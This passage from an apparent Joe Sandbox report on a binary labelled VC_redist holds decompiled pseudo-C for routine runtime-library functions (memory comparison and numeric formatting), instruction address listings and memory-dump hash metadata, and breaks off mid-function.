                                                                          								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                                                          								if(__ecx != 0) {
                                                                          									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                          								}
                                                                          								goto L11;
                                                                          							}
                                                                          							0 = 0 | __edi > 0x00000000;
                                                                          							__ecx = (__edi > 0) * 2 != 1;
                                                                          							if((__edi > 0) * 2 != 1) {
                                                                          								goto L1;
                                                                          							}
                                                                          							goto L8;
                                                                          						}
                                                                          						0 = 0 | __edi > 0x00000000;
                                                                          						__ecx = (__edi > 0) * 2 != 1;
                                                                          						if((__edi > 0) * 2 != 1) {
                                                                          							goto L1;
                                                                          						}
                                                                          						goto L6;
                                                                          					}
                                                                          					0 = 0 | __edi > 0x00000000;
                                                                          					__ecx = (__edi > 0) * 2 != 1;
                                                                          					if((__edi > 0) * 2 != 1) {
                                                                          						goto L1;
                                                                          					}
                                                                          					goto L4;
                                                                          				}
                                                                          				L1:
                                                                          				_t184 = _t231;
                                                                          				return _t184;
                                                                          			}
                                                                          0x000404a6
                                                                          0x000404ae
                                                                          0x000404b0
                                                                          0x000404c8
                                                                          0x000404d0
                                                                          0x000404d2
                                                                          0x000404ea
                                                                          0x000404f2
                                                                          0x000404f4
                                                                          0x000404fd
                                                                          0x000404fd
                                                                          0x00000000
                                                                          0x000404f4
                                                                          0x000404db
                                                                          0x000404e4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000404e4
                                                                          0x000404b9
                                                                          0x000404c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000404c2
                                                                          0x00040497
                                                                          0x000404a0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000404a0
                                                                          0x000403f5
                                                                          0x000403f7
                                                                          0x0004040f
                                                                          0x00040417
                                                                          0x00040419
                                                                          0x00040431
                                                                          0x00040439
                                                                          0x0004043b
                                                                          0x00040453
                                                                          0x0004045b
                                                                          0x0004045d
                                                                          0x00040466
                                                                          0x00040466
                                                                          0x00000000
                                                                          0x0004045d
                                                                          0x00040444
                                                                          0x0004044d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004044d
                                                                          0x00040422
                                                                          0x0004042b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004042b
                                                                          0x00040400
                                                                          0x00040409
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040409
                                                                          0x0004035e
                                                                          0x00040360
                                                                          0x00040378
                                                                          0x00040380
                                                                          0x00040382
                                                                          0x0004039a
                                                                          0x000403a2
                                                                          0x000403a4
                                                                          0x000403bc
                                                                          0x000403c4
                                                                          0x000403c6
                                                                          0x000403cf
                                                                          0x000403cf
                                                                          0x00000000
                                                                          0x000403c6
                                                                          0x000403ad
                                                                          0x000403b6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000403b6
                                                                          0x0004038b
                                                                          0x00040394
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040394
                                                                          0x00040369
                                                                          0x00040372
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040372
                                                                          0x000402c7
                                                                          0x000402c9
                                                                          0x000402e1
                                                                          0x000402e9
                                                                          0x000402eb
                                                                          0x00040303
                                                                          0x0004030b
                                                                          0x0004030d
                                                                          0x00040325
                                                                          0x0004032d
                                                                          0x0004032f
                                                                          0x00040338
                                                                          0x00040338
                                                                          0x00000000
                                                                          0x0004032f
                                                                          0x00040316
                                                                          0x0004031f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004031f
                                                                          0x000402f4
                                                                          0x000402fd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000402fd
                                                                          0x000402d2
                                                                          0x000402db
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040235
                                                                          0x00040235
                                                                          0x0004023c
                                                                          0x0004023e
                                                                          0x00040252
                                                                          0x00040252
                                                                          0x0004025a
                                                                          0x0004025c
                                                                          0x00040270
                                                                          0x00040270
                                                                          0x00040278
                                                                          0x0004027a
                                                                          0x0004028e
                                                                          0x0004028e
                                                                          0x00040296
                                                                          0x00040298
                                                                          0x000402a1
                                                                          0x000402a1
                                                                          0x00000000
                                                                          0x00040298
                                                                          0x00040280
                                                                          0x00040283
                                                                          0x0004028c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004028c
                                                                          0x00040262
                                                                          0x00040265
                                                                          0x0004026e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004026e
                                                                          0x00040244
                                                                          0x00040247
                                                                          0x00040250
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040250
                                                                          0x00040225
                                                                          0x00040225
                                                                          0x00041016

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                          • Instruction ID: e990b161545dcc733e98dc94ea025561401ad35563c70c7a787c4d0682480af3
                                                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                          • Instruction Fuzzy Hash: E2C1E6B22050A30ADFAD4A79D53413EBAF05B927B131A17BDD9B3EB0C4EE30C524D624
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0003FE15(void* __edx, void* __esi) {
                                                                          				signed char _t177;
                                                                          				void* _t178;
                                                                          				signed char _t179;
                                                                          				signed char _t180;
                                                                          				signed char _t181;
                                                                          				signed char _t183;
                                                                          				signed char _t184;
                                                                          				void* _t228;
                                                                          				void* _t278;
                                                                          				void* _t281;
                                                                          				void* _t283;
                                                                          				void* _t285;
                                                                          				void* _t287;
                                                                          				void* _t289;
                                                                          				void* _t291;
                                                                          				void* _t293;
                                                                          				void* _t295;
                                                                          				void* _t297;
                                                                          				void* _t299;
                                                                          				void* _t301;
                                                                          				void* _t303;
                                                                          				void* _t305;
                                                                          				void* _t307;
                                                                          				void* _t309;
                                                                          				void* _t311;
                                                                          				void* _t313;
                                                                          				void* _t315;
                                                                          				void* _t317;
                                                                          				void* _t319;
                                                                          				void* _t321;
                                                                          				void* _t322;
                                                                          
                                                                          				_t322 = __esi;
                                                                          				_t278 = __edx;
                                                                          				_t177 =  *(__esi - 0x1c);
                                                                          				if(_t177 ==  *(__edx - 0x1c)) {
                                                                          					_t228 = 0;
                                                                          					L10:
                                                                          					if(_t228 != 0) {
                                                                          						L78:
                                                                          						_t178 = _t228;
                                                                          						return _t178;
                                                                          					}
                                                                          					_t179 =  *(_t322 - 0x18);
                                                                          					if(_t179 ==  *(_t278 - 0x18)) {
                                                                          						_t228 = 0;
                                                                          						L21:
                                                                          						if(_t228 != 0) {
                                                                          							goto L78;
                                                                          						}
                                                                          						_t180 =  *(_t322 - 0x14);
                                                                          						if(_t180 ==  *(_t278 - 0x14)) {
                                                                          							_t228 = 0;
                                                                          							L32:
                                                                          							if(_t228 != 0) {
                                                                          								goto L78;
                                                                          							}
                                                                          							_t181 =  *(_t322 - 0x10);
                                                                          							if(_t181 ==  *(_t278 - 0x10)) {
                                                                          								_t228 = 0;
                                                                          								L43:
                                                                          								if(_t228 != 0) {
                                                                          									goto L78;
                                                                          								}
                                                                          								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                                                                          									_t228 = 0;
                                                                          									L54:
                                                                          									if(_t228 != 0) {
                                                                          										goto L78;
                                                                          									}
                                                                          									_t183 =  *(_t322 - 8);
                                                                          									if(_t183 ==  *(_t278 - 8)) {
                                                                          										_t228 = 0;
                                                                          										L65:
                                                                          										if(_t228 != 0) {
                                                                          											goto L78;
                                                                          										}
                                                                          										_t184 =  *(_t322 - 4);
                                                                          										if(_t184 ==  *(_t278 - 4)) {
                                                                          											_t228 = 0;
                                                                          											L76:
                                                                          											if(_t228 == 0) {
                                                                          												_t228 = 0;
                                                                          											}
                                                                          											goto L78;
                                                                          										}
                                                                          										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                                                                          										if(_t281 == 0) {
                                                                          											L69:
                                                                          											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                                                                          											if(_t283 == 0) {
                                                                          												L71:
                                                                          												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                                                                          												if(_t285 == 0) {
                                                                          													L73:
                                                                          													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                                                                          													if(_t228 != 0) {
                                                                          														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                          													}
                                                                          													goto L76;
                                                                          												}
                                                                          												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                                                                          												if(_t228 != 0) {
                                                                          													goto L78;
                                                                          												}
                                                                          												goto L73;
                                                                          											}
                                                                          											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                                                                          											if(_t228 != 0) {
                                                                          												goto L78;
                                                                          											}
                                                                          											goto L71;
                                                                          										}
                                                                          										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                                                                          										if(_t228 != 0) {
                                                                          											goto L78;
                                                                          										}
                                                                          										goto L69;
                                                                          									}
                                                                          									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                                                                          									if(_t287 == 0) {
                                                                          										L58:
                                                                          										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                                                                          										if(_t289 == 0) {
                                                                          											L60:
                                                                          											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                                                                          											if(_t291 == 0) {
                                                                          												L62:
                                                                          												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                                                                          												if(_t228 != 0) {
                                                                          													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                          												}
                                                                          												goto L65;
                                                                          											}
                                                                          											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                                                                          											if(_t228 != 0) {
                                                                          												goto L78;
                                                                          											}
                                                                          											goto L62;
                                                                          										}
                                                                          										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                                                                          										if(_t228 != 0) {
                                                                          											goto L78;
                                                                          										}
                                                                          										goto L60;
                                                                          									}
                                                                          									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                                                                          									if(_t228 != 0) {
                                                                          										goto L78;
                                                                          									}
                                                                          									goto L58;
                                                                          								}
                                                                          								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                                                                          								if(_t293 == 0) {
                                                                          									L47:
                                                                          									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                                                                          									if(_t295 == 0) {
                                                                          										L49:
                                                                          										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                                                                          										if(_t297 == 0) {
                                                                          											L51:
                                                                          											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                                                                          											if(_t228 != 0) {
                                                                          												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                          											}
                                                                          											goto L54;
                                                                          										}
                                                                          										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                                          										if(_t228 != 0) {
                                                                          											goto L78;
                                                                          										}
                                                                          										goto L51;
                                                                          									}
                                                                          									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                                                                          									if(_t228 != 0) {
                                                                          										goto L78;
                                                                          									}
                                                                          									goto L49;
                                                                          								}
                                                                          								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                                                                          								if(_t228 != 0) {
                                                                          									goto L78;
                                                                          								}
                                                                          								goto L47;
                                                                          							}
                                                                          							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                                                                          							if(_t299 == 0) {
                                                                          								L36:
                                                                          								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                                                                          								if(_t301 == 0) {
                                                                          									L38:
                                                                          									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                                                                          									if(_t303 == 0) {
                                                                          										L40:
                                                                          										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                                                                          										if(_t228 != 0) {
                                                                          											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                          										}
                                                                          										goto L43;
                                                                          									}
                                                                          									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                                          									if(_t228 != 0) {
                                                                          										goto L78;
                                                                          									}
                                                                          									goto L40;
                                                                          								}
                                                                          								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                                          								if(_t228 != 0) {
                                                                          									goto L78;
                                                                          								}
                                                                          								goto L38;
                                                                          							}
                                                                          							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                                          							if(_t228 != 0) {
                                                                          								goto L78;
                                                                          							}
                                                                          							goto L36;
                                                                          						}
                                                                          						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                                                                          						if(_t305 == 0) {
                                                                          							L25:
                                                                          							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                                                                          							if(_t307 == 0) {
                                                                          								L27:
                                                                          								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                                                                          								if(_t309 == 0) {
                                                                          									L29:
                                                                          									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                                                                          									if(_t228 != 0) {
                                                                          										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                          									}
                                                                          									goto L32;
                                                                          								}
                                                                          								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                                          								if(_t228 != 0) {
                                                                          									goto L78;
                                                                          								}
                                                                          								goto L29;
                                                                          							}
                                                                          							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                                          							if(_t228 != 0) {
                                                                          								goto L78;
                                                                          							}
                                                                          							goto L27;
                                                                          						}
                                                                          						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                                          						if(_t228 != 0) {
                                                                          							goto L78;
                                                                          						}
                                                                          						goto L25;
                                                                          					}
                                                                          					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                                                                          					if(_t311 == 0) {
                                                                          						L14:
                                                                          						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                                                                          						if(_t313 == 0) {
                                                                          							L16:
                                                                          							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                                                                          							if(_t315 == 0) {
                                                                          								L18:
                                                                          								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                                                                          								if(_t228 != 0) {
                                                                          									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                          								}
                                                                          								goto L21;
                                                                          							}
                                                                          							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                                          							if(_t228 != 0) {
                                                                          								goto L78;
                                                                          							}
                                                                          							goto L18;
                                                                          						}
                                                                          						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                                          						if(_t228 != 0) {
                                                                          							goto L78;
                                                                          						}
                                                                          						goto L16;
                                                                          					}
                                                                          					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                                          					if(_t228 != 0) {
                                                                          						goto L78;
                                                                          					}
                                                                          					goto L14;
                                                                          				}
                                                                          				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                          				if(_t317 == 0) {
                                                                          					L3:
                                                                          					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                                                                          					if(_t319 == 0) {
                                                                          						L5:
                                                                          						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                                                                          						if(_t321 == 0) {
                                                                          							L7:
                                                                          							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                                                                          							if(_t228 != 0) {
                                                                          								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                          							}
                                                                          							goto L10;
                                                                          						}
                                                                          						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                                          						if(_t228 != 0) {
                                                                          							goto L78;
                                                                          						}
                                                                          						goto L7;
                                                                          					}
                                                                          					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                                          					if(_t228 != 0) {
                                                                          						goto L78;
                                                                          					}
                                                                          					goto L5;
                                                                          				}
                                                                          				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                                          				if(_t228 != 0) {
                                                                          					goto L78;
                                                                          				}
                                                                          				goto L3;
                                                                          			}
                                                                          0x0004001a
                                                                          0x00040023
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040023
                                                                          0x0003fff8
                                                                          0x00040001
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040001
                                                                          0x0003ff56
                                                                          0x0003ff58
                                                                          0x0003ff70
                                                                          0x0003ff78
                                                                          0x0003ff7a
                                                                          0x0003ff92
                                                                          0x0003ff9a
                                                                          0x0003ff9c
                                                                          0x0003ffb4
                                                                          0x0003ffbc
                                                                          0x0003ffbe
                                                                          0x0003ffc7
                                                                          0x0003ffc7
                                                                          0x00000000
                                                                          0x0003ffbe
                                                                          0x0003ffa5
                                                                          0x0003ffae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ffae
                                                                          0x0003ff83
                                                                          0x0003ff8c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ff8c
                                                                          0x0003ff61
                                                                          0x0003ff6a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ff6a
                                                                          0x0003febf
                                                                          0x0003fec1
                                                                          0x0003fed9
                                                                          0x0003fee1
                                                                          0x0003fee3
                                                                          0x0003fefb
                                                                          0x0003ff03
                                                                          0x0003ff05
                                                                          0x0003ff1d
                                                                          0x0003ff25
                                                                          0x0003ff27
                                                                          0x0003ff30
                                                                          0x0003ff30
                                                                          0x00000000
                                                                          0x0003ff27
                                                                          0x0003ff0e
                                                                          0x0003ff17
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ff17
                                                                          0x0003feec
                                                                          0x0003fef5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003fef5
                                                                          0x0003feca
                                                                          0x0003fed3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003fed3
                                                                          0x0003fe28
                                                                          0x0003fe2a
                                                                          0x0003fe42
                                                                          0x0003fe4a
                                                                          0x0003fe4c
                                                                          0x0003fe64
                                                                          0x0003fe6c
                                                                          0x0003fe6e
                                                                          0x0003fe86
                                                                          0x0003fe8e
                                                                          0x0003fe90
                                                                          0x0003fe99
                                                                          0x0003fe99
                                                                          0x00000000
                                                                          0x0003fe90
                                                                          0x0003fe77
                                                                          0x0003fe80
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003fe80
                                                                          0x0003fe55
                                                                          0x0003fe5e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003fe5e
                                                                          0x0003fe33
                                                                          0x0003fe3c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction ID: 03287ecaad9679de8a8e4bad73453f8e5672bdf9f3f8490649ce785e8d0d677a
                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction Fuzzy Hash: 84C1C2722050A309DFAD4A79D53813EBAE16FA27B131A57BDD8B3DB1D4EE30C524D620
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E00042D50(void* __ecx, void* __edi) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				void* __ebx;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t52;
                                                                          				signed int _t54;
                                                                          				signed int _t55;
                                                                          				void* _t56;
                                                                          				signed char _t60;
                                                                          				signed char _t62;
                                                                          				signed int _t64;
                                                                          				void* _t65;
                                                                          				signed int _t66;
                                                                          				signed char _t75;
                                                                          				signed char _t78;
                                                                          				void* _t86;
                                                                          				void* _t88;
                                                                          				signed char _t90;
                                                                          				signed char _t92;
                                                                          				signed int _t93;
                                                                          				signed int _t96;
                                                                          				signed int _t98;
                                                                          				signed int _t99;
                                                                          				signed int _t102;
                                                                          				void* _t104;
                                                                          				signed int _t110;
                                                                          				unsigned int _t112;
                                                                          				signed char _t114;
                                                                          				unsigned int _t122;
                                                                          				void* _t123;
                                                                          				signed int _t124;
                                                                          				short _t125;
                                                                          				void* _t128;
                                                                          				void* _t129;
                                                                          				void* _t130;
                                                                          				signed int _t131;
                                                                          				void* _t132;
                                                                          				void* _t134;
                                                                          				void* _t135;
                                                                          
                                                                          				_t123 = __edi;
                                                                          				_t52 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t52 ^ _t131;
                                                                          				_t130 = __ecx;
                                                                          				_t102 = 0;
                                                                          				_t122 = 0x41;
                                                                          				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                                                                          				_t104 = 0x58;
                                                                          				_t134 = _t54 - 0x64;
                                                                          				if(_t134 > 0) {
                                                                          					__eflags = _t54 - 0x70;
                                                                          					if(__eflags > 0) {
                                                                          						_t55 = _t54 - 0x73;
                                                                          						__eflags = _t55;
                                                                          						if(_t55 == 0) {
                                                                          							L9:
                                                                          							_t56 = E00043782(_t130);
                                                                          							L10:
                                                                          							if(_t56 != 0) {
                                                                          								__eflags =  *((intOrPtr*)(_t130 + 0x30)) - _t102;
                                                                          								if( *((intOrPtr*)(_t130 + 0x30)) != _t102) {
                                                                          									L71:
                                                                          									L72:
                                                                          									return E0003DE36(_t102, _v8 ^ _t131, _t122, _t123, _t130);
                                                                          								}
                                                                          								_t122 =  *(_t130 + 0x20);
                                                                          								_push(_t123);
                                                                          								_v16 = _t102;
                                                                          								_t60 = _t122 >> 4;
                                                                          								_v12 = _t102;
                                                                          								_t124 = 0x20;
                                                                          								__eflags = 1 & _t60;
                                                                          								if((1 & _t60) == 0) {
                                                                          									L46:
                                                                          									_t110 =  *(_t130 + 0x32) & 0x0000ffff;
                                                                          									__eflags = _t110 - 0x78;
                                                                          									if(_t110 == 0x78) {
                                                                          										L48:
                                                                          										_t62 = _t122 >> 5;
                                                                          										__eflags = _t62 & 0x00000001;
                                                                          										if((_t62 & 0x00000001) == 0) {
                                                                          											L50:
                                                                          											__eflags = 0;
                                                                          											L51:
                                                                          											__eflags = _t110 - 0x61;
                                                                          											if(_t110 == 0x61) {
                                                                          												L54:
                                                                          												_t64 = 1;
                                                                          												L55:
                                                                          												_t125 = 0x30;
                                                                          												__eflags = _t64;
                                                                          												if(_t64 != 0) {
                                                                          													L57:
                                                                          													_t65 = 0x58;
                                                                          													 *((short*)(_t131 + _t102 * 2 - 0xc)) = _t125;
                                                                          													__eflags = _t110 - _t65;
                                                                          													if(_t110 == _t65) {
                                                                          														L60:
                                                                          														_t66 = 1;
                                                                          														L61:
                                                                          														__eflags = _t66;
                                                                          														asm("cbw");
                                                                          														 *((short*)(_t131 + _t102 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                                                                          														_t102 = _t102 + 2;
                                                                          														__eflags = _t102;
                                                                          														L62:
                                                                          														_t128 =  *((intOrPtr*)(_t130 + 0x24)) -  *((intOrPtr*)(_t130 + 0x38)) - _t102;
                                                                          														__eflags = _t122 & 0x0000000c;
                                                                          														if((_t122 & 0x0000000c) == 0) {
                                                                          															E0004209A(_t130 + 0x448, 0x20, _t128, _t130 + 0x18);
                                                                          															_t132 = _t132 + 0x10;
                                                                          														}
                                                                          														E00043A9D(_t130 + 0x448,  &_v16, _t102, _t130 + 0x18,  *((intOrPtr*)(_t130 + 0xc)));
                                                                          														_t112 =  *(_t130 + 0x20);
                                                                          														_t102 = _t130 + 0x18;
                                                                          														_t75 = _t112 >> 3;
                                                                          														__eflags = _t75 & 0x00000001;
                                                                          														if((_t75 & 0x00000001) != 0) {
                                                                          															_t114 = _t112 >> 2;
                                                                          															__eflags = _t114 & 0x00000001;
                                                                          															if((_t114 & 0x00000001) == 0) {
                                                                          																E0004209A(_t130 + 0x448, 0x30, _t128, _t102);
                                                                          																_t132 = _t132 + 0x10;
                                                                          															}
                                                                          														}
                                                                          														E0004397F(_t130, 0);
                                                                          														__eflags =  *_t102;
                                                                          														if( *_t102 >= 0) {
                                                                          															_t78 =  *(_t130 + 0x20) >> 2;
                                                                          															__eflags = _t78 & 0x00000001;
                                                                          															if((_t78 & 0x00000001) != 0) {
                                                                          																E0004209A(_t130 + 0x448, 0x20, _t128, _t102);
                                                                          															}
                                                                          														}
                                                                          														_pop(_t123);
                                                                          														goto L71;
                                                                          													}
                                                                          													_t86 = 0x41;
                                                                          													__eflags = _t110 - _t86;
                                                                          													if(_t110 == _t86) {
                                                                          														goto L60;
                                                                          													}
                                                                          													_t66 = 0;
                                                                          													goto L61;
                                                                          												}
                                                                          												__eflags = _t64;
                                                                          												if(_t64 == 0) {
                                                                          													goto L62;
                                                                          												}
                                                                          												goto L57;
                                                                          											}
                                                                          											_t129 = 0x41;
                                                                          											__eflags = _t110 - _t129;
                                                                          											if(_t110 == _t129) {
                                                                          												goto L54;
                                                                          											}
                                                                          											_t64 = 0;
                                                                          											goto L55;
                                                                          										}
                                                                          										goto L51;
                                                                          									}
                                                                          									_t88 = 0x58;
                                                                          									__eflags = _t110 - _t88;
                                                                          									if(_t110 != _t88) {
                                                                          										goto L50;
                                                                          									}
                                                                          									goto L48;
                                                                          								}
                                                                          								_t90 = _t122 >> 6;
                                                                          								__eflags = 1 & _t90;
                                                                          								if((1 & _t90) == 0) {
                                                                          									__eflags = 1 & _t122;
                                                                          									if((1 & _t122) == 0) {
                                                                          										_t92 = _t122 >> 1;
                                                                          										__eflags = 1 & _t92;
                                                                          										if((1 & _t92) == 0) {
                                                                          											goto L46;
                                                                          										}
                                                                          										_v16 = _t124;
                                                                          										L45:
                                                                          										_t102 = 1;
                                                                          										goto L46;
                                                                          									}
                                                                          									_push(0x2b);
                                                                          									L40:
                                                                          									_pop(_t93);
                                                                          									_v16 = _t93;
                                                                          									goto L45;
                                                                          								}
                                                                          								_push(0x2d);
                                                                          								goto L40;
                                                                          							}
                                                                          							L11:
                                                                          							goto L72;
                                                                          						}
                                                                          						_t96 = _t55;
                                                                          						__eflags = _t96;
                                                                          						if(__eflags == 0) {
                                                                          							L28:
                                                                          							_push(_t102);
                                                                          							_push(0xa);
                                                                          							L29:
                                                                          							_t56 = E0004351A(_t130, _t123, __eflags);
                                                                          							goto L10;
                                                                          						}
                                                                          						__eflags = _t96 - 3;
                                                                          						if(__eflags != 0) {
                                                                          							goto L11;
                                                                          						}
                                                                          						_push(0);
                                                                          						L13:
                                                                          						_push(0x10);
                                                                          						goto L29;
                                                                          					}
                                                                          					if(__eflags == 0) {
